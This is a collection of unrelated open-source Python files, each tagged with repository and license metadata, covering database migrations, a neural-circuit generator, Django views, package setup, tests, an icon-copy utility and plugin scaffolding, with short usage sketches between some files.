#latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output ------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'pybozocrack', u'PyBozoCrack Documentation', [u'Henrique Pereira'], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ---------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ('index', 'pybozocrack', u'PyBozoCrack Documentation', u'Henrique Pereira', 'pybozocrack', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False
ikkebr/PyBozoCrack
docs/conf.py
Python
bsd-3-clause
8,453
0.005442
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2016-2018 CERN. # # Invenio is free software; you can redistribute it and/or modify it # under the terms of the MIT License; see LICENSE file for more details. """Create oauthclient tables.""" import sqlalchemy as sa import sqlalchemy_utils from alembic import op from sqlalchemy.engine.reflection import Inspector # revision identifiers, used by Alembic. revision = '97bbc733896c' down_revision = '44ab9963e8cf' branch_labels = () depends_on = '9848d0149abd' def upgrade(): """Upgrade database.""" op.create_table( 'oauthclient_remoteaccount', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('client_id', sa.String(length=255), nullable=False), sa.Column( 'extra_data', sqlalchemy_utils.JSONType(), nullable=False), sa.ForeignKeyConstraint(['user_id'], [u'accounts_user.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('user_id', 'client_id') ) op.create_table( 'oauthclient_useridentity', sa.Column('id', sa.String(length=255), nullable=False), sa.Column('method', sa.String(length=255), nullable=False), sa.Column('id_user', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['id_user'], [u'accounts_user.id'], ), sa.PrimaryKeyConstraint('id', 'method') ) op.create_index( 'useridentity_id_user_method', 'oauthclient_useridentity', ['id_user', 'method'], unique=True ) op.create_table( 'oauthclient_remotetoken', sa.Column('id_remote_account', sa.Integer(), nullable=False), sa.Column('token_type', sa.String(length=40), nullable=False), sa.Column( 'access_token', sqlalchemy_utils.EncryptedType(), nullable=False), sa.Column('secret', sa.Text(), nullable=False), sa.ForeignKeyConstraint( ['id_remote_account'], [u'oauthclient_remoteaccount.id'], name='fk_oauthclient_remote_token_remote_account' ), sa.PrimaryKeyConstraint('id_remote_account', 'token_type') ) def downgrade(): """Downgrade database.""" ctx = op.get_context() insp = Inspector.from_engine(ctx.connection.engine) op.drop_table('oauthclient_remotetoken') for fk in insp.get_foreign_keys('oauthclient_useridentity'): if fk['referred_table'] == 'accounts_user': op.drop_constraint( op.f(fk['name']), 'oauthclient_useridentity', type_='foreignkey' ) op.drop_index( 'useridentity_id_user_method', table_name='oauthclient_useridentity') op.drop_table('oauthclient_useridentity') op.drop_table('oauthclient_remoteaccount')
tiborsimko/invenio-oauthclient
invenio_oauthclient/alembic/97bbc733896c_create_oauthclient_tables.py
Python
mit
2,898
0
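As a hedged follow-up sketch (the connection URL is a placeholder, not part of the migration): after running the upgrade, the newly created tables can be listed with the same SQLAlchemy Inspector that downgrade() uses above.

from sqlalchemy import create_engine
from sqlalchemy.engine.reflection import Inspector

engine = create_engine('sqlite:///invenio.db')  # placeholder connection URL, assumption
insp = Inspector.from_engine(engine)
# Show only the oauthclient tables created by upgrade()
print([t for t in insp.get_table_names() if t.startswith('oauthclient_')])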
#!/usr/bin/env python """ Create generic LPU and simple pulse input signal. """ from itertools import product import sys import numpy as np import h5py import networkx as nx def create_lpu_graph(lpu_name, N_sensory, N_local, N_proj): """ Create a generic LPU graph. Creates a graph containing the neuron and synapse parameters for an LPU containing the specified number of local and projection neurons. The graph also contains the parameters for a set of sensory neurons that accept external input. All neurons are either spiking or graded potential neurons; the Leaky Integrate-and-Fire model is used for the former, while the Morris-Lecar model is used for the latter (i.e., the neuron's membrane potential is deemed to be its output rather than the time when it emits an action potential). Synapses use either the alpha function model or a conductance-based model. Parameters ---------- lpu_name : str Name of LPU. Used in port identifiers. N_sensory : int Number of sensory neurons. N_local : int Number of local neurons. N_proj : int Number of project neurons. Returns ------- g : networkx.MultiDiGraph Generated graph. """ # Set numbers of neurons: neu_type = ('sensory', 'local', 'proj') neu_num = (N_sensory, N_local, N_proj) # Neuron ids are between 0 and the total number of neurons: G = nx.MultiDiGraph() in_port_idx = 0 spk_out_id = 0 gpot_out_id = 0 for (t, n) in zip(neu_type, neu_num): for i in range(n): id = t+"_"+str(i) name = t+"_"+str(i) # Half of the sensory neurons and projection neurons are # spiking neurons. The other half are graded potential neurons. # All local neurons are graded potential only. if t != 'local' and np.random.rand() < 0.5: G.add_node(id, {'class': 'LeakyIAF', 'name': name+'_s', 'initV': np.random.uniform(-60.0,-25.0), 'reset_potential': -67.5489770451, 'resting_potential': 0.0, 'threshold': -25.1355161007, 'resistance': 1002.445570216, 'capacitance': 0.0669810502993, 'circuit': 'proj' if t == 'proj' else 'local' }) # Projection neurons are all assumed to be attached to output # ports (which are represented as separate nodes): if t == 'proj': G.add_node(id+'_port', {'class': 'Port', 'name': name+'port', 'port_type': 'spike', 'port_io': 'out', 'selector': '/%s/out/spk/%s' % (lpu_name, str(spk_out_id)) }) G.add_edge(id, id+'_port') spk_out_id += 1 else: # An input port node is created for and attached to each non-projection # neuron with a synapse; this assumes that data propagates from one LPU to # another as follows: # LPU0[projection neuron] -> LPU0[output port] -> LPU1[input port] -> # LPU1[synapse] -> LPU1[non-projection neuron] G.add_node('in_port'+str(in_port_idx), {'class': 'Port', 'name': 'in_port'+str(in_port_idx), 'port_type': 'spike', 'port_io': 'in', 'selector': '/%s/in/spk/%s' % (lpu_name, in_port_idx) }) G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, {'class': 'AlphaSynapse', 'name': 'in_port'+str(in_port_idx)+'-'+name, 'ad': 0.19*1000, 'ar': 1.1*100, 'gmax': 0.003*1e-3, 'reverse': 65.0, 'circuit': 'local' }) G.add_edge('in_port'+str(in_port_idx), 'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id) G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, id) in_port_idx += 1 else: G.add_node(id, {'class': "MorrisLecar", 'name': name+'_g', 'V1': 30., 'V2': 15., 'V3': 0., 'V4': 30., 'phi': 0.025, 'offset': 0., 'V_L': -50., 'V_Ca': 100.0, 'V_K': -70.0, 'g_Ca': 1.1, 'g_K': 2.0, 'g_L': 0.5, 'initV': -52.14, 'initn': 0.02, 'circuit': 'proj' if t == 'proj' else 'local' }) # Projection neurons are all assumed to be attached to output # ports (which are 
not represented as separate nodes): if t == 'proj': G.add_node(id+'_port', {'class': 'Port', 'name': name+'port', 'port_type': 'gpot', 'port_io': 'out', 'selector': '/%s/out/gpot/%s' % (lpu_name, str(gpot_out_id)) }) G.add_edge(id, id+'_port') gpot_out_id += 1 else: G.add_node('in_port'+str(in_port_idx), {'class': 'Port', 'name': 'in_port'+str(in_port_idx), 'port_type': 'gpot', 'port_io': 'in', 'selector': '/%s/in/gpot/%s' % (lpu_name, in_port_idx) }) G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, {'class': 'PowerGPotGPot', 'name': 'in_port'+str(in_port_idx)+'-'+name, 'reverse': -80.0, 'saturation': 0.03*1e-3, 'slope': 0.8*1e-6, 'power': 1.0, 'threshold': -50.0, 'circuit': 'local' }) G.add_edge('in_port'+str(in_port_idx), 'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, delay = 0.001) G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id, id) in_port_idx += 1 # Assume a probability of synapse existence for each group of synapses: # sensory -> local, sensory -> projection, local -> projection, # projection -> local: for r, (i, j) in zip((0.5, 0.1, 0.1, 0.3), ((0, 1), (0, 2), (1, 2), (2, 1))): for src, tar in product(range(neu_num[i]), range(neu_num[j])): # Don't connect all neurons: if np.random.rand() > r: continue # Connections from the sensory neurons use the alpha function model; # all other connections use the power_gpot_gpot model: pre_id = neu_type[i]+"_"+str(src) post_id = neu_type[j]+"_"+str(tar) name = G.node[pre_id]['name'] + '-' + G.node[post_id]['name'] synapse_id = 'synapse_' + name if G.node[pre_id]['class'] is 'LeakyIAF': G.add_node(synapse_id, {'class' : 'AlphaSynapse', 'name' : name, 'ar' : 1.1*1e2, 'ad' : 1.9*1e3, 'reverse' : 65.0 if G.node[post_id]['class'] is 'LeakyIAF' else 10.0, 'gmax' : 3*1e-6 if G.node[post_id]['class'] is 'LeakyIAF' else 3.1e-7, 'circuit' : 'local'}) G.add_edge(pre_id, synapse_id) G.add_edge(synapse_id, post_id) else: G.add_node(synapse_id, {'class' : 'PowerGPotGPot', 'name' : name, 'slope' : 0.8*1e-6, 'threshold' : -50.0, 'power' : 1.0, 'saturation' : 0.03*1e-3, 'reverse' : -100.0, 'circuit' : 'local'}) G.add_edge(pre_id, synapse_id, delay = 0.001) G.add_edge(synapse_id, post_id) return G def create_lpu(file_name, lpu_name, N_sensory, N_local, N_proj): """ Create a generic LPU graph. Creates a GEXF file containing the neuron and synapse parameters for an LPU containing the specified number of local and projection neurons. The GEXF file also contains the parameters for a set of sensory neurons that accept external input. All neurons are either spiking or graded potential neurons; the Leaky Integrate-and-Fire model is used for the former, while the Morris-Lecar model is used for the latter (i.e., the neuron's membrane potential is deemed to be its output rather than the time when it emits an action potential). Synapses use either the alpha function model or a conductance-based model. Parameters ---------- file_name : str Output GEXF file name. lpu_name : str Name of LPU. Used in port identifiers. N_sensory : int Number of sensory neurons. N_local : int Number of local neurons. N_proj : int Number of project neurons. Returns ------- g : networkx.MultiDiGraph Generated graph. """ g = create_lpu_graph(lpu_name, N_sensory, N_local, N_proj) nx.write_gexf(g, file_name) def create_input(file_name, N_sensory, dt=1e-4, dur=1.0, start=0.3, stop=0.6, I_max=0.6): """ Create input stimulus for sensory neurons in artificial LPU. Creates an HDF5 file containing input signals for the specified number of neurons. 
The signals consist of a rectangular pulse of specified duration and magnitude. Parameters ---------- file_name : str Name of output HDF5 file. g: networkx.MultiDiGraph NetworkX graph object representing the LPU dt : float Time resolution of generated signal. dur : float Duration of generated signal. start : float Start time of signal pulse. stop : float Stop time of signal pulse. I_max : float Pulse magnitude. """ Nt = int(dur/dt) t = np.arange(0, dt*Nt, dt) uids = ["sensory_"+str(i) for i in range(N_sensory)] uids = np.array(uids) I = np.zeros((Nt, N_sensory), dtype=np.float64) I[np.logical_and(t>start, t<stop)] = I_max with h5py.File(file_name, 'w') as f: f.create_dataset('I/uids', data=uids) f.create_dataset('I/data', (Nt, N_sensory), dtype=np.float64, data=I) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('lpu_file_name', nargs='?', default='generic_lpu.gexf.gz', help='LPU file name') parser.add_argument('in_file_name', nargs='?', default='generic_input.h5', help='Input file name') parser.add_argument('-s', type=int, help='Seed random number generator') parser.add_argument('-l', '--lpu', type=str, default='gen', help='LPU name') args = parser.parse_args() if args.s is not None: np.random.seed(args.s) dt = 1e-4 dur = 1.0 start = 0.3 stop = 0.6 I_max = 0.6 neu_num = [np.random.randint(31, 40) for i in xrange(3)] create_lpu(args.lpu_file_name, args.lpu, *neu_num) g = nx.read_gexf(args.lpu_file_name) create_input(args.in_file_name, neu_num[0], dt, dur, start, stop, I_max) create_lpu(args.lpu_file_name, args.lpu, *neu_num)
AdamRTomkins/Neurokernel-singularity-container
examples/data/gen_generic_lpu.py
Python
apache-2.0
12,988
0.004312
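For reference, a minimal sketch (using the default output file names from the argument parser above) that loads the generated GEXF graph and inspects the HDF5 pulse stimulus written by create_input():

import h5py
import networkx as nx

# Load the LPU graph written by create_lpu() (default file name assumed).
g = nx.read_gexf('generic_lpu.gexf.gz')
print(g.number_of_nodes(), 'nodes,', g.number_of_edges(), 'edges')

# Inspect the rectangular pulse input written by create_input().
with h5py.File('generic_input.h5', 'r') as f:
    uids = f['I/uids'][:]
    data = f['I/data'][:]
print(data.shape)  # (time steps, number of sensory neurons)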
from django.conf.urls.defaults import patterns, url, include urlpatterns = patterns('professor.views', url(r'^$', 'home', name='home'), url(r'^adicionar-compromisso$', 'adicionarCompromisso', name='adicionarCompromisso'), url(r'^visualizar-compromisso/(?P<id>\d{1,10})$', 'visualizarCompromisso', name='visualizarCompromisso'), url(r'^editar-compromisso/(?P<id>\d{1,10})$', 'editarCompromisso', name='editarCompromisso'), url(r'^excluir-compromisso/(?P<id>\d{1,10})$', 'excluirCompromisso', name='excluirCompromisso'), url(r'^get-compromissos$', 'getCompromissos', name='getCompromissos'), url(r'^disponibilidadeAula$', 'disponibilidadeAula', name='disponibilidadeAula'), url(r'^informarInteresseDisciplina$', 'informarInteresseDisciplina', name='informarInteresseDisciplina'), url(r'^getInteressesDisciplina$', 'getInteressesDisciplina', name='getInteressesDisciplina'), url(r'^getDisponibilidadeAula$', 'getDisponibilidadeAula', name='getDisponibilidadeAula'), )
dextervip/rpv
GerenDisponibilidade/professor/urls.py
Python
gpl-3.0
1,015
0.009852
from setuptools import setup, find_packages setup(name='ddns_updater_aws', version='0.1', author='Felix Bouliane', license='MIT', py_modules=[], packages=find_packages(exclude=['contrib', 'docs', 'test']), url='https://github.com/fbouliane/ddns-updater-aws', classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 2.7', 'Topic :: Internet', 'Topic :: Internet :: Name Service (DNS)' ], keywords='DNS, Dynamic DNS, fixed ip, route53, AWS, Amazon Web Services', install_requires=[ 'dnspython>=1.12.0,<2.0', 'ipaddress>=1.0.16,<2.0', 'route53>=1.0,<2.0', 'configparser>=3.3,<4.0' ], entry_points={ 'console_scripts': [ 'ddns-updater-aws = ddns_updater_aws.__main__:main', ] } )
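Aside from the distutils/setuptools import detail, the structure is standard; a setuptools `setup()` import is assumed in the cleaned version above so that install_requires and entry_points are handled by setuptools directly.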
fbouliane/ddns-updater-aws
setup.py
Python
mit
1,053
0
# Copyright 2013 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for volume name_id.""" from oslo.config import cfg from cinder import context from cinder import db from cinder import test from cinder.tests import utils as testutils CONF = cfg.CONF class NameIDsTestCase(test.TestCase): """Test cases for naming volumes with name_id.""" def setUp(self): super(NameIDsTestCase, self).setUp() self.ctxt = context.RequestContext(user_id='user_id', project_id='project_id') def tearDown(self): super(NameIDsTestCase, self).tearDown() def test_name_id_same(self): """New volume should have same 'id' and 'name_id'.""" vol_ref = testutils.create_volume(self.ctxt, size=1) self.assertEqual(vol_ref['name_id'], vol_ref['id']) expected_name = CONF.volume_name_template % vol_ref['id'] self.assertEqual(vol_ref['name'], expected_name) def test_name_id_diff(self): """Change name ID to mimic volume after migration.""" vol_ref = testutils.create_volume(self.ctxt, size=1) db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'}) vol_ref = db.volume_get(self.ctxt, vol_ref['id']) expected_name = CONF.volume_name_template % 'fake' self.assertEqual(vol_ref['name'], expected_name) def test_name_id_snapshot_volume_name(self): """Make sure snapshot['volume_name'] is updated.""" vol_ref = testutils.create_volume(self.ctxt, size=1) db.volume_update(self.ctxt, vol_ref['id'], {'name_id': 'fake'}) snap_ref = testutils.create_snapshot(self.ctxt, vol_ref['id']) expected_name = CONF.volume_name_template % 'fake' self.assertEqual(snap_ref['volume_name'], expected_name)
rickerc/cinder_audit
cinder/tests/db/test_name_id.py
Python
apache-2.0
2,344
0
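A standalone sketch of the naming rule exercised by the tests above: the volume's display name is the name template applied to name_id, which starts out equal to the volume's id and can later diverge (e.g. after migration). The template string here is an assumed default, not taken from the test file.

volume_name_template = 'volume-%s'  # assumed default value of CONF.volume_name_template

vol = {'id': 'abc-123', 'name_id': 'abc-123'}
print(volume_name_template % vol['name_id'])  # volume-abc-123

# Mimic a migrated volume whose name_id differs from its id.
vol['name_id'] = 'fake'
print(volume_name_template % vol['name_id'])  # volume-fake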
""" View endpoints for Survey """ import logging import json from django.contrib.auth.decorators import login_required from django.http import ( HttpResponse, HttpResponseRedirect, HttpResponseNotFound ) from django.core.urlresolvers import reverse from django.views.decorators.http import require_POST from django.conf import settings from django.utils.html import escape from opaque_keys.edx.keys import CourseKey from edxmako.shortcuts import render_to_response from survey.models import SurveyForm from microsite_configuration import microsite log = logging.getLogger("edx.survey") @login_required def view_survey(request, survey_name): """ View to render the survey to the end user """ redirect_url = request.GET.get('redirect_url') return view_student_survey(request.user, survey_name, redirect_url=redirect_url) def view_student_survey(user, survey_name, course=None, redirect_url=None, is_required=False, skip_redirect_url=None): """ Shared utility method to render a survey form NOTE: This method is shared between the Survey and Courseware Djangoapps """ redirect_url = redirect_url if redirect_url else reverse('dashboard') dashboard_redirect_url = reverse('dashboard') skip_redirect_url = skip_redirect_url if skip_redirect_url else dashboard_redirect_url survey = SurveyForm.get(survey_name, throw_if_not_found=False) if not survey: return HttpResponseRedirect(redirect_url) # the result set from get_answers, has an outer key with the user_id # just remove that outer key to make the JSON payload simplier existing_answers = survey.get_answers(user=user).get(user.id, {}) platform_name = microsite.get_value('platform_name', settings.PLATFORM_NAME) context = { 'existing_data_json': json.dumps(existing_answers), 'postback_url': reverse('submit_answers', args=[survey_name]), 'redirect_url': redirect_url, 'skip_redirect_url': skip_redirect_url, 'dashboard_redirect_url': dashboard_redirect_url, 'survey_form': survey.form, 'is_required': is_required, 'mail_to_link': microsite.get_value('email_from_address', settings.CONTACT_EMAIL), 'platform_name': platform_name, 'course': course, } return render_to_response("survey/survey.html", context) @require_POST @login_required def submit_answers(request, survey_name): """ Form submission post-back endpoint. NOTE: We do not have a formal definition of a Survey Form, it's just some authored HTML form fields (via Django Admin site). Therefore we do not do any validation of the submission server side. It is assumed that all validation is done via JavaScript in the survey.html file """ survey = SurveyForm.get(survey_name, throw_if_not_found=False) if not survey: return HttpResponseNotFound() answers = {} for key in request.POST.keys(): # support multi-SELECT form values, by string concatenating them with a comma separator array_val = request.POST.getlist(key) answers[key] = request.POST[key] if len(array_val) == 0 else ','.join(array_val) # the URL we are supposed to redirect to is # in a hidden form field redirect_url = answers['_redirect_url'] if '_redirect_url' in answers else reverse('dashboard') course_key = CourseKey.from_string(answers['course_id']) if 'course_id' in answers else None allowed_field_names = survey.get_field_names() # scrub the answers to make sure nothing malicious from the user gets stored in # our database, e.g. 
JavaScript filtered_answers = {} for answer_key in answers.keys(): # only allow known input fields if answer_key in allowed_field_names: filtered_answers[answer_key] = escape(answers[answer_key]) survey.save_user_answers(request.user, filtered_answers, course_key) response_params = json.dumps({ # The HTTP end-point for the payment processor. "redirect_url": redirect_url, }) return HttpResponse(response_params, content_type="text/json")
xingyepei/edx-platform
lms/djangoapps/survey/views.py
Python
agpl-3.0
4,127
0.002908
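As a standalone illustration of the answer-scrubbing step described in submit_answers() above (field names and values here are invented for the example): only whitelisted field names are kept, and each value is HTML-escaped before storage.

from django.utils.html import escape

allowed_field_names = {'favourite_course', 'feedback'}  # hypothetical survey fields
answers = {'feedback': '<script>alert(1)</script>', 'junk': 'ignored'}

filtered_answers = {}
for answer_key in answers:
    # only allow known input fields
    if answer_key in allowed_field_names:
        filtered_answers[answer_key] = escape(answers[answer_key])

print(filtered_answers)  # {'feedback': '&lt;script&gt;alert(1)&lt;/script&gt;'}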
from __future__ import absolute_import from agms.exception.not_found_exception import NotFoundException try: import requests except ImportError as e: raise NotFoundException(e) class RequestsClient(object): def http_do(self, http_verb, url, headers, request_body): response = requests.request( http_verb, url, headers=headers, data=request_body, verify=True ) return [response.status_code, response.text]
agmscode/agms_python
agms/util/requests_client.py
Python
mit
509
0.001965
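A hedged usage sketch of the RequestsClient defined above; the URL, headers, and body are placeholders, not part of the agms API.

client = RequestsClient()
status_code, body = client.http_do(
    'POST',
    'https://example.com/api/endpoint',           # placeholder URL
    headers={'Content-Type': 'application/xml'},  # placeholder headers
    request_body='<request></request>',           # placeholder payload
)
print(status_code, body[:200])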
#!/usr/bin/env python """Small tool for copying android icons from material-design-icons repo to specified android gradle module. It copies all density versions of png files to appropriate res subdirectories. Usage: picon.py add <category> <name> [-i <path>] [-o <path>] [-c <color>] [-s <size>] picon.py rem <name> [-o <path>] [-c <color>] [-s <size>] picon.py (-h | --help) picon.py (-v | --version) Options: -c, --color <color> Which color version to use (black or white or all) [default: all] -s, --size <size> Which size to use (number in dp units or 'all') [default: all] -i, --input <path> Path where local copy of material-design-icons repo is located [default: /media/data/android_big/material-design-icons] -o, --output <path> Path of top android module directory where icons will be copied [default: /home/marek/code/android/MyBlocks/myres] -h, --help Show help screen. -v, --version Show version. Commands: add: copy new icon from material-design-icons repo to android module rem: remove all versions of given icon from android module """ VERSION='0.1.0' try: from docopt import docopt except ImportError: print 'This script needs a "docopt" module (http://docopt.org)' raise from shutil import copyfile from os import remove from os import mkdir from os.path import join from os.path import isdir densities = [ "mdpi", "hdpi", "xhdpi", "xxhdpi", "xxxhdpi", ] def add(category, name, color, size, inp, outp): if color == "all": add(category, name, "black", size, inp, outp) add(category, name, "white", size, inp, outp) return if size == "all": add(category, name, color, "18", inp, outp) add(category, name, color, "24", inp, outp) add(category, name, color, "36", inp, outp) add(category, name, color, "48", inp, outp) return name = name + "_" + color + "_" + size + "dp.png" for density in densities: idir = join(inp, category, "drawable-" + density) odir = join(outp, "src", "main", "res", "drawable-" + density) if not isdir(odir): mkdir(odir) copyfile(join(idir, name), join(odir, name)) def rem(name, color, size, outp): if color == "all": rem(name, "black", size, outp) rem(name, "white", size, outp) return if size == "all": rem(name, color, "18", outp) rem(name, color, "24", outp) rem(name, color, "36", outp) rem(name, color, "48", outp) return name = name + "_" + color + "_" + size + "dp.png" for density in densities: ofile = join(outp, "src", "main", "res", "drawable-" + density, name) try: remove(ofile) except OSError: print "Can not remove:", ofile def main(): argdict = docopt(__doc__, version=VERSION) if argdict["add"]: add(argdict["<category>"], argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--input"], argdict["--output"]) elif argdict["rem"]: rem(argdict["<name>"], argdict["--color"], argdict["--size"], argdict["--output"]) if __name__ == '__main__': main()
langara/MyBlocks
picon.py
Python
apache-2.0
3,366
0.007427
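Besides the docopt CLI shown in the module docstring, the add() and rem() helpers can be called directly; a sketch using the script's own default paths and an invented icon name:

# Copy all density variants of a hypothetical black 24dp 'ic_search' icon from the
# material-design-icons checkout into the android module's res/drawable-* directories.
add('action', 'ic_search', 'black', '24',
    '/media/data/android_big/material-design-icons',
    '/home/marek/code/android/MyBlocks/myres')

# Remove every size/color variant of the same icon again.
rem('ic_search', 'all', 'all', '/home/marek/code/android/MyBlocks/myres')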
import numpy as np from scipy.sparse import spdiags, block_diag from scipy.sparse.linalg import spsolve, isolve from matplotlib import pyplot as plt import copy import time import ThreeChannels_generalizing reload(ThreeChannels_generalizing) r = ThreeChannels_generalizing.rnet() self = r plt.ion() # PER RIVER # ############# self.eta = [] self.nx = 1E2 + 1 ####################### ### INPUT VARIABLES ### ####################### # GLOBAL UNIFORM # ################## self.D = 200E-3 # [m] [uniform so far] porosity = lambda_p = 0.35 # [-] n_time_steps = 10 self.flow_from_to = np.array([[0,2],[1,2]]) self.flow_from = [[], [], [0,1]] self.flow_to = [[2], [2], []] self.b = [20, 20, 40] self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20]]) self.nsegments = len(self.flow_from) #self.flow_from_to = np.array([[0,1]]) #self.flow_from = [[], [0]] #self.flow_to = [[1], []] self.flow_from_to = np.array([[0,2],[1,2],[2,4],[3,4]]) self.flow_from = [[], [], [0,1], [], [2,3]] self.flow_to = [[2], [2], [4], [4], []] self.b = [20, 20, 40, 20, 60] #self.b = [20, 30, 50, 10, 60] self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20],[3,50]]) """ self.flow_from_to = np.array([[0,1]]) self.flow_from = [[], [0]] self.flow_to = [[1], []] #self.b = [20, 20, 40, 20, 60] self.b = [20, 20] """ # 3 rivers -- would often pull them in from GIS # Keep everything uniform for starters xmax = 1E3 self.B = 100 * np.ones(self.nx) S = 1E-2 self.dt = 3.15E0 self.x = [] self.dx = [] self.h = [] self.eta = [] # Multiple rivers for Si in range(len(self.flow_to)): self.x.append(np.linspace(0, xmax, self.nx)) self.dx.append(np.mean(np.diff(self.x[-1]))) # Special case of uniform grid spacing self.h.append(2. * np.ones(self.nx)) # specific case of 2 m depth everywhere #self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 3-river set here self.x[-3] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here self.x[-2] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here self.x[-1] += self.x[2][-1] + self.dx[-1] #Very specific to this 5-river set here #self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 2-river set here for row in self.x: self.eta.append( -S * row + np.max(self.x)*S ) self.eta[-1] = np.round(self.eta[-1], 6) # coarse trick to rmv floating point issues self.eta0 = copy.deepcopy(self.eta) ######################### ### DERIVED VARIABLES ### ######################### self.nts = np.linspace(0, n_time_steps, n_time_steps+1) # start at 1 below, t0 is initial self.A0 = [] for Si in range(len(self.x)): self.A0.append( 11.325 / (1 - lambda_p) * self.h[Si]/self.D ) #q_s_in = 0.69623693 # [m^3 s^{-1}] # q_s for equilibrium in each channel; used for transport slope upstream # boundary conditions #q_s_out = whatever it has to be to transport out as much material as it receives q_s_equilibrium = np.array(self.sediment__discharge_per_unit_width()) #print np.mean(eta) # Ignoring for now -- for iterating # Assuming in order: so flow_from is really irrelavant; flow_to is the important part """ fig = plt.figure() plt.ylim((0,50)) ax = plt.subplot(111) """ #for row in self.eta: # row += 10 for ts in range(10):#self.nts: # 3 iterations is usually good; nothing special about it, though. 
self.eta_iter = copy.deepcopy(self.eta) # For iteration self.stack_vars() for iter_i in range(20): self.build_coeff_matrix(q_s_equilibrium) self.build_RHS() #print np.max(np.hstack(self.eta_iter)) self.solve() self.update() """ ax.clear() if ts % 25 == 0: self.riverplot(linewidth=2) #plt.ylim((0,40)) #plt.draw() plt.pause(0.0001) """ self.stack_vars() #self.plot_coeff_matrix() #plt.ylim((0,40)) self.riverplot(linewidth=4, plot_start=True) plt.show()
awickert/river-network-evolution
backup/run_ThreeChannels_generalizing.py
Python
gpl-3.0
3,834
0.021127
import os import tuned.logs from . import base from tuned.utils.commands import commands log = tuned.logs.get() class cpulist_present(base.Function): """ Checks whether CPUs from list are present, returns list containing only present CPUs """ def __init__(self): # arbitrary number of arguments super(cpulist_present, self).__init__("cpulist_present", 0) def execute(self, args): if not super(cpulist_present, self).execute(args): return None cpus = self._cmd.cpulist_unpack(",,".join(args)) present = self._cmd.cpulist_unpack(self._cmd.read_file("/sys/devices/system/cpu/present")) return ",".join(str(v) for v in sorted(list(set(cpus).intersection(set(present)))))
redhat-performance/tuned
tuned/profiles/functions/function_cpulist_present.py
Python
gpl-2.0
691
0.023155
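The class above delegates list parsing to tuned's commands helper; a self-contained sketch of the same present-CPU filtering idea, with a simplified parser that only understands plain "0-3,5"-style lists:

def unpack_cpulist(spec):
    """Expand a simple cpulist such as '0-3,5' into a set of ints."""
    cpus = set()
    for part in spec.split(','):
        if '-' in part:
            low, high = part.split('-')
            cpus.update(range(int(low), int(high) + 1))
        elif part:
            cpus.add(int(part))
    return cpus

with open('/sys/devices/system/cpu/present') as f:
    present = unpack_cpulist(f.read().strip())

requested = unpack_cpulist('0-7')
print(','.join(str(c) for c in sorted(requested & present)))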
# -*- coding: utf-8 -*- """ Base Class for InvenTree plugins """ import warnings from django.db.utils import OperationalError, ProgrammingError from django.utils.text import slugify class InvenTreePluginBase(): """ Base class for a plugin DO NOT USE THIS DIRECTLY, USE plugin.IntegrationPluginBase """ def __init__(self): pass # Override the plugin name for each concrete plugin instance PLUGIN_NAME = '' PLUGIN_SLUG = None PLUGIN_TITLE = None def plugin_name(self): """ Name of plugin """ return self.PLUGIN_NAME def plugin_slug(self): """ Slug of plugin If not set plugin name slugified """ slug = getattr(self, 'PLUGIN_SLUG', None) if slug is None: slug = self.plugin_name() return slugify(slug.lower()) def plugin_title(self): """ Title of plugin """ if self.PLUGIN_TITLE: return self.PLUGIN_TITLE else: return self.plugin_name() def plugin_config(self, raise_error=False): """ Return the PluginConfig object associated with this plugin """ try: import plugin.models cfg, _ = plugin.models.PluginConfig.objects.get_or_create( key=self.plugin_slug(), name=self.plugin_name(), ) except (OperationalError, ProgrammingError) as error: cfg = None if raise_error: raise error return cfg def is_active(self): """ Return True if this plugin is currently active """ cfg = self.plugin_config() if cfg: return cfg.active else: return False # TODO @matmair remove after InvenTree 0.7.0 release class InvenTreePlugin(InvenTreePluginBase): """ This is here for legacy reasons and will be removed in the next major release """ def __init__(self): warnings.warn("Using the InvenTreePlugin is deprecated", DeprecationWarning) super().__init__()
inventree/InvenTree
InvenTree/plugin/plugin.py
Python
mit
2,145
0.000932
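A minimal sketch of a concrete plugin built on the base class above (the name and title are invented for the example, and Django is assumed to be importable):

class ExamplePlugin(InvenTreePluginBase):
    PLUGIN_NAME = 'ExamplePlugin'
    PLUGIN_TITLE = 'Example Plugin'
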